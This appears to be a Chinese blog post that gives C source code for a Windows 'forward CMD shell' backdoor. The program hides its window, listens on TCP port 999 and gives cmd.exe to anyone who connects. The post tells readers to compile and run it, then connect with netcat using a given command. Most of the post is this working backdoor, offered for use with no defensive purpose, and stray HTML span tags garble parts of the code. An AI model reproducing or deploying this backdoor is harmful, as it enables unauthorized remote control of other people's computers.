C/C++实现正向CMDShell

发表于 更新于 分类于

1.首先使用vc6编译器编译后门,并运行

1.首先使用vc6编译器编译后门,并运行

#pragma comment(lib,"ws2_32.lib")



#ifdef _MSC_VER
#pragma comment( linker, “/subsystem:"windows" /entry:"mainCRTStartup"“ )
#endif


#include <winsock2.h>
#include <windows.h>
#define Port 999


int main()
{
    SOCKET sSocket,cSocket;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    WSADATA wsaData;
    sockaddr_in sSockaddr;
    char szCmdPath[MAX_PATH];


GetEnvironmentVariable(</span><span style="color: #800000;">"</span><span style="color: #800000;">COMSPEC</span><span style="color: #800000;">"</span><span style="color: #000000;">,szCmdPath,MAX_PATH);
ZeroMemory(</span>&amp;wsaData,<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(wsaData));
ZeroMemory(</span>&amp;si,<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(STARTUPINFO));
ZeroMemory(</span>&amp;pi,<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(PROCESS_INFORMATION));

WSAStartup(</span><span style="color: #800080;">0x0202</span>,&amp;<span style="color: #000000;">wsaData);
cSocket</span>=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,<span style="color: #800080;">0</span>,<span style="color: #800080;">0</span><span style="color: #000000;">);
sSockaddr.sin_addr.s_addr</span>=<span style="color: #000000;">INADDR_ANY;
sSockaddr.sin_family</span>=<span style="color: #000000;">AF_INET;
sSockaddr.sin_port</span>=<span style="color: #000000;">htons(Port);
bind(cSocket,(sockaddr</span>*)&amp;sSockaddr,<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(sSockaddr));
listen(cSocket,</span><span style="color: #800080;">1</span><span style="color: #000000;">);

</span><span style="color: #0000ff;">int</span> sLen=<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(sSockaddr);
sSocket</span>=accept(cSocket,(sockaddr*)&amp;sSockaddr,&amp;<span style="color: #000000;">sLen);
si.cb</span>=<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(si);
si.dwFlags</span>=STARTF_USESTDHANDLES|<span style="color: #000000;">STARTF_USESHOWWINDOW;
si.hStdInput</span>=<span style="color: #000000;">(HANDLE)sSocket;
si.hStdOutput</span>=<span style="color: #000000;">(HANDLE)sSocket;
si.hStdError</span>=<span style="color: #000000;">(HANDLE)sSocket;
CreateProcess(NULL,szCmdPath,NULL,NULL,TRUE,</span><span style="color: #800080;">0</span>,NULL,NULL,&amp;si,&amp;<span style="color: #000000;">pi);
WaitForSingleObject(pi.hProcess,INFINITE);

CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
closesocket(cSocket);
closesocket(sSocket);
WSACleanup();

</span><span style="color: #0000ff;">return</span> <span style="color: #800080;">0</span><span style="color: #000000;">;



}

 

连接时使用nc工具链接即可  下载地址:https://eternallybored.org/misc/netcat/

 

nc执行命令 nc64.exe -t 192.168.1.12 999 即可链接到主机